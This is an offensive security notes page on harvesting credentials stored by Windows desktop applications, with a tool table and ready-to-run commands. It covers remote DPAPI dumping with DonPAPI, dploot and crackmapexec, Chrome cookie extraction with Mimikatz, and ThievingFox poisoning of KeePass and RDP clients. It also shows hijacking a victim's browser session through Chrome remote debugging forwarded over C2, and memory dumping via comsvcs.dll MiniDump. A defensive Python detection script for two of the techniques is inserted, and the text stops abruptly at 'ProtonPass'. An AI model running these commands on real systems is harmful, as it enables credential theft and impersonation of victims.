Application Credential Access

30.04.2024 · dadevel

The following tools can be used to access credentials stored by various Windows desktop applications. Many of these credential stores are protected by DPAPI.

| Tool | Language | Access | Supported Applications |
|---|---|---|---|
| DonPAPI | Python | Remote | Credential Manager, Vault, Certificates, Internet Explorer, Chrome, Edge, Firefox, WiFi, VNC, mRemoteNG |
| dploot | Python | Remote | Credential Manager, Vault, Certificates, Remote Desktop Connection Manager, Chrome, Edge, Firefox, WiFi |
| crackmapexec | Python | Remote | Uses dploot |
| LaZagne | Python | Local | Chrome, Edge, Firefox, Outlook, Thunderbird, FileZilla, KeePass, WinSCP and many more |
| SharpChromium | C# | Local | Chrome, Edge |
| ThunderFox | C# | Local | Firefox, Thunderbird |
| offline_address_book_extractor.py | Python | Offline | Outlook address book parser |
| OutlookSpy | C# | Local | Outlook |
| SessionGopher | PowerShell | Local | WinSCP, PuTTY, FileZilla, RDP |
| strings2 + ProcessStringExtractor | C + PowerShell | Local | Generic, find patterns in process memory |
| PMP-Decrypter | C# | Local | Patch My PC |
| dumpscan | Python | Remote | Find certificates in Minidumps |

Dump DPAPI-protected secrets remotely and decrypt them with the domain backup key, the user's password or the user's NT hash.

Worked, but crashed in the end.

donpapi -o ./ws01/dpapi -pvk ./corp.pvk -local_auth administrator:'passw0rd'@ws01.corp.local
donpapi -o ./ws01/dpapi -credz ./passwords.txt -local_auth administrator:'passw0rd'@ws01.corp.local
donpapi -o ./ws01/dpapi -credz ./nthashes.txt -local_auth administrator:'passw0rd'@ws01.corp.local

Failed during testing.

dploot triage -dump-all -export-triage ./ws01/dpapi -pvk ./corp.pvk -u administrator -p 'passw0rd' ws01.corp.local && dploot machinetriage -dump-all -export-triage ./ws01/dpapi -pvk ./corp.pvk -u administrator -p 'passw0rd' ws01.corp.local
dploot triage -dump-all -export-triage ./ws01/dpapi -passwords ./passwords.txt -u administrator -p 'passw0rd' ws01.corp.local && dploot machinetriage -dump-all -export-triage ./ws01/dpapi -passwords ./passwords.txt -u administrator -p 'passw0rd' ws01.corp.local
dploot triage -dump-all -export-triage ./ws01/dpapi -nthashes ./nthashes.txt -u administrator -p 'passw0rd' ws01.corp.local && dploot machinetriage -dump-all -export-triage ./ws01/dpapi -nthashes ./nthashes.txt -u administrator -p 'passw0rd' ws01.corp.local

As an unprivileged user you can dump your own secrets; as local admin you can dump the secrets of every user whose password is stored in the CMEDB; as domain admin you can decrypt everything using the domain backup keys. Uses dploot under the hood (source).

crackmapexec smb ws01.corp.local --local-auth -u administrator -p passw0rd --dpapi passwords && crackmapexec smb ws01.corp.local --local-auth -u administrator -p passw0rd --dpapi cookies

Dump Chrome cookies with Mimikatz. Cookies for Azure are ESTSAUTH, ESTSAUTHPERSISTENT and ESTSAUTHLIGHT.

mimikatz.exe "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit

Dump credentials from various sources like KeePass, KeePassXC, mstsc, RDCMan and MobaXterm with ThievingFox.

thievingfox poison --all corp.local/jdoeadm:'passw0rd'@ws01.corp.local
thievingfox collect --all corp.local/jdoeadm:'passw0rd'@ws01.corp.local
thievingfox cleanup --all corp.local/jdoeadm:'passw0rd'@ws01.corp.local

Untested tools:

  • pandora, dumps credentials from various password manager Chrome plugins like 1Password, Bitwarden and LastPass
  • hekatomb, dumps domain backup keys, downloads credential files from all domain computers, decrypts the files

Chrome Remote Debugging

Start Chrome in headless and remote debugging mode.

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-debugging-address=127.0.0.1 --user-data-dir=%TEMP%\headless.profile --ignore-certificate-errors about:blank --headless
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --remote-debugging-address=127.0.0.1 --user-data-dir=%TEMP%\headless.profile --ignore-certificate-errors about:blank --headless

Reverse forward the debug port over your C2.

Open Chrome on your machine and go to chrome://inspect. Now you can browse the web in the name of your victim.

Unsaved Notepad

Dump the content of an open notepad.exe window that is not written to a file (source):

rundll32.exe comsvcs.dll MiniDump %PID% .\notepad.log full
strings.exe --encoding=l .\notepad.log
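
Both the Chrome remote debugging procedure above and the comsvcs.dll MiniDump trick leave a distinctive command line in process-creation telemetry. The following detection logic is an added example, not part of the original notes or of any of the listed tools: it runs two rules over constructed Sysmon Event ID 1 style records (the field names Image, CommandLine and ParentImage are an assumption about the telemetry source) and reports browser launches with a remote debugging port, rated higher when combined with --headless, and rundll32 invocations of comsvcs.dll MiniDump together with the target PID and dump path.

```python
"""Detection rules for two techniques from these notes, run over constructed
process-creation records (Sysmon Event ID 1 field names are assumed):
  1. a Chromium browser started with a remote debugging port
  2. rundll32.exe using the MiniDump export of comsvcs.dll
Added example, not code from the original notes or from the tools listed there."""

import re
from dataclasses import dataclass

# Browsers covered by the remote-debugging rule: the two named in the notes.
BROWSERS = {"chrome.exe", "msedge.exe"}

# Constructed sample events (not real telemetry). The last two are benign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-debugging-address=127.0.0.1 --user-data-dir=C:\Users\jdoe\AppData\Local\Temp\headless.profile --ignore-certificate-errors about:blank --headless',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe comsvcs.dll MiniDump 4712 .\notepad.log full",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 4712 C:\Temp\n.dmp full",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US',
     "ParentImage": r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


@dataclass
class Finding:
    rule: str
    severity: str
    image: str
    parent: str
    detail: dict


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def tokenize(cmdline: str) -> list:
    """Split a Windows command line, keeping double-quoted runs together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def switches(tokens: list) -> dict:
    """Map Chromium-style --switch[=value] tokens to their values ('' if none)."""
    out = {}
    for tok in tokens:
        if tok.startswith("--"):
            name, _, value = tok.partition("=")
            out[name.lower()] = value
    return out


def detect_remote_debugging(event: dict):
    """Rule 1: browser started with a DevTools remote debugging endpoint."""
    if image_name(event["Image"]) not in BROWSERS:
        return None
    sw = switches(tokenize(event["CommandLine"]))
    if "--remote-debugging-port" not in sw and "--remote-debugging-pipe" not in sw:
        return None
    # The procedure in the notes pairs the port with --headless so no window is
    # shown; that combination is rated above an interactive developer session.
    severity = "high" if "--headless" in sw else "medium"
    return Finding("browser_remote_debugging", severity, event["Image"], event["ParentImage"],
                   {"port": sw.get("--remote-debugging-port"),
                    "address": sw.get("--remote-debugging-address"),
                    "user_data_dir": sw.get("--user-data-dir"),
                    "headless": "--headless" in sw})


# comsvcs.dll may be given by name or full path, with or without a comma
# before the export; the PID and dump path follow the MiniDump keyword.
COMSVCS_MINIDUMP = re.compile(
    r'comsvcs(?:\.dll)?\s*,?\s*minidump\s+(\d+)\s+("[^"]*"|\S+)', re.IGNORECASE)


def detect_comsvcs_minidump(event: dict):
    """Rule 2: rundll32 writing a process MiniDump through comsvcs.dll."""
    m = COMSVCS_MINIDUMP.search(event["CommandLine"])
    if not m:
        return None
    return Finding("comsvcs_minidump", "high", event["Image"], event["ParentImage"],
                   {"pid": m.group(1), "dump_path": m.group(2).strip('"')})


RULES = (detect_remote_debugging, detect_comsvcs_minidump)


def scan(events: list) -> list:
    """Apply every rule to every event and collect the findings in order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.image} (parent {f.parent}) {f.detail}")
```

The MiniDump rule matches on the command line rather than on the image name so that it still fires if rundll32.exe is copied under another name; the dump path it extracts is what a responder would pull for review, since it contains whatever the dumped process held in memory.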

Notepad++ Backups

Inspect files in %USERPROFILE%\AppData\Roaming\Notepad++\backup.

ProtonPass